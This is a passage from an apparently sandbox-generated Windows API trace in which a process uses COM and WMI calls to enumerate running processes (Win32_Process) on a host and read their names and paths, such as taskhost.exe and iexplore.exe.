[5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.495] WbemDefPath:IUnknown:Release (This=0x5605738) returned 0x3 [0212.495] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0212.495] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0212.496] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ec20, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0212.496] WbemDefPath:IUnknown:Release (This=0x560ec20) returned 0x2 [0212.496] WbemDefPath:IUnknown:Release (This=0x560ec20) returned 0x1 [0212.496] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0212.496] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0212.496] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ec20, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560ec20) returned 0x0 [0212.496] WbemDefPath:IUnknown:AddRef (This=0x560ec20) returned 0x3 [0212.496] WbemDefPath:IUnknown:Release (This=0x560ec20) returned 0x2 [0212.496] WbemDefPath:IWbemPath:SetText (This=0x560ec20, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"") returned 0x0 [0212.496] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0212.496] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0212.496] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.496] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0212.496] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0212.496] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.496] IWbemClassObject:Get (in: This=0x5454cf8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267d76c*=0, plFlavor=0x267d770*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskhost.exe", varVal2=0x0), pType=0x267d76c*=8, plFlavor=0x267d770*=0) returned 0x0 [0212.496] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0212.496] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0212.496] IWbemClassObject:Get (in: This=0x5454cf8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267d76c*=8, plFlavor=0x267d770*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskhost.exe", varVal2=0x0), pType=0x267d76c*=8, plFlavor=0x267d770*=0) returned 0x0 [0212.496] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0212.496] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0212.497] CoTaskMemAlloc (cb=0x4) returned 0x5605768 [0212.497] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5605768, puReturned=0x267acc0 | out: apObjects=0x5605768*=0x53a7b50, puReturned=0x267acc0*=0x1) returned 0x0 [0212.497] IUnknown:QueryInterface (in: This=0x53a7b50, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x53a7b50) returned 0x0 [0212.497] IUnknown:QueryInterface (in: This=0x53a7b50, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0212.497] IUnknown:QueryInterface (in: This=0x53a7b50, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0212.498] IUnknown:AddRef (This=0x53a7b50) returned 0x3 [0212.498] IUnknown:QueryInterface (in: This=0x53a7b50, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0212.498] IUnknown:QueryInterface (in: This=0x53a7b50, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0212.498] IUnknown:QueryInterface (in: This=0x53a7b50, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x53a7b54) returned 0x0 [0212.498] IMarshal:GetUnmarshalClass (in: This=0x53a7b54, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0212.498] IUnknown:Release (This=0x53a7b54) returned 0x3 [0212.498] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0212.498] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0212.498] IUnknown:QueryInterface (in: This=0x53a7b50, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0212.498] IUnknown:Release (This=0x53a7b50) returned 0x2 [0212.498] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0212.498] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0212.498] IUnknown:QueryInterface (in: This=0x53a7b50, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x53a7b50) returned 0x0 [0212.498] IUnknown:AddRef (This=0x53a7b50) returned 0x4 [0212.498] IUnknown:Release (This=0x53a7b50) returned 0x3 [0212.498] IUnknown:Release (This=0x53a7b50) returned 0x2 [0212.498] CoTaskMemFree (pv=0x5605768) [0212.499] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0212.499] IUnknown:AddRef (This=0x53a7b50) returned 0x3 [0212.499] IWbemClassObject:Get (in: This=0x53a7b50, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0212.499] IWbemClassObject:Get (in: This=0x53a7b50, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"396\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0212.499] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"396\"") returned 0x64 [0212.499] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"396\"") returned 0x64 [0212.499] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0212.499] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0212.499] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0212.499] IUnknown:Release (This=0x6d0cac) returned 0x1 [0212.500] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5605768) returned 0x0 [0212.500] WbemDefPath:IUnknown:QueryInterface (in: This=0x5605768, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0212.500] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5605768, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560ed00) returned 0x0 [0212.501] WbemDefPath:IUnknown:Release (This=0x5605768) returned 0x0 [0212.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ed00, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560ed00) returned 0x0 [0212.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ed00, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0212.501] WbemDefPath:IUnknown:AddRef (This=0x560ed00) returned 0x3 [0212.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ed00, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0212.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ed00, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0212.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ed00, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5605778) returned 0x0 [0212.501] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5605778, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.501] WbemDefPath:IUnknown:Release (This=0x5605778) returned 0x3 [0212.501] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0212.501] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0212.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ed00, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0212.501] WbemDefPath:IUnknown:Release (This=0x560ed00) returned 0x2 [0212.501] WbemDefPath:IUnknown:Release (This=0x560ed00) returned 0x1 [0212.501] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0212.501] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0212.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ed00, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560ed00) returned 0x0 [0212.501] WbemDefPath:IUnknown:AddRef (This=0x560ed00) returned 0x3 [0212.502] WbemDefPath:IUnknown:Release (This=0x560ed00) returned 0x2 [0212.502] WbemDefPath:IWbemPath:SetText (This=0x560ed00, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"396\"") returned 0x0 [0212.502] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0212.502] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0212.502] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.502] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0212.502] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0212.502] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.502] IWbemClassObject:Get (in: This=0x53a7b50, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267dfe0*=0, plFlavor=0x267dfe4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x267dfe0*=8, plFlavor=0x267dfe4*=0) returned 0x0 [0212.502] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0212.502] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0212.502] IWbemClassObject:Get (in: This=0x53a7b50, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267dfe0*=8, plFlavor=0x267dfe4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x267dfe0*=8, plFlavor=0x267dfe4*=0) returned 0x0 [0212.502] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0212.502] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0212.502] CoTaskMemAlloc (cb=0x4) returned 0x56057b8 [0212.502] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56057b8, puReturned=0x267acc0 | out: apObjects=0x56057b8*=0x560fc30, puReturned=0x267acc0*=0x1) returned 0x0 [0212.503] IUnknown:QueryInterface (in: This=0x560fc30, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560fc30) returned 0x0 [0212.503] IUnknown:QueryInterface (in: This=0x560fc30, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0212.503] IUnknown:QueryInterface (in: This=0x560fc30, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0212.503] IUnknown:AddRef (This=0x560fc30) returned 0x3 [0212.503] IUnknown:QueryInterface (in: This=0x560fc30, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0212.503] IUnknown:QueryInterface (in: This=0x560fc30, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0212.504] IUnknown:QueryInterface (in: This=0x560fc30, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560fc34) returned 0x0 [0212.504] IMarshal:GetUnmarshalClass (in: This=0x560fc34, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0212.504] IUnknown:Release (This=0x560fc34) returned 0x3 [0212.504] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0212.504] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0212.504] IUnknown:QueryInterface (in: This=0x560fc30, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0212.504] IUnknown:Release (This=0x560fc30) returned 0x2 [0212.504] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0212.504] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0212.504] IUnknown:QueryInterface (in: This=0x560fc30, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560fc30) returned 0x0 [0212.504] IUnknown:AddRef (This=0x560fc30) returned 0x4 [0212.504] IUnknown:Release (This=0x560fc30) returned 0x3 [0212.504] IUnknown:Release (This=0x560fc30) returned 0x2 [0212.504] CoTaskMemFree (pv=0x56057b8) [0212.504] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0212.504] IUnknown:AddRef (This=0x560fc30) returned 0x3 [0212.504] IWbemClassObject:Get (in: This=0x560fc30, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0212.505] IWbemClassObject:Get (in: This=0x560fc30, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2124\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0212.505] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2124\"") returned 0x66 [0212.505] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2124\"") returned 0x66 [0212.505] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0212.505] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0212.505] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0212.505] IUnknown:Release (This=0x6d0cac) returned 0x1 [0212.506] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56057b8) returned 0x0 [0212.506] WbemDefPath:IUnknown:QueryInterface (in: This=0x56057b8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0212.506] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56057b8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560ede0) returned 0x0 [0212.506] WbemDefPath:IUnknown:Release (This=0x56057b8) returned 0x0 [0212.506] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ede0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560ede0) returned 0x0 [0212.506] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ede0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0212.506] WbemDefPath:IUnknown:AddRef (This=0x560ede0) returned 0x3 [0212.506] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ede0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0212.506] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ede0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), 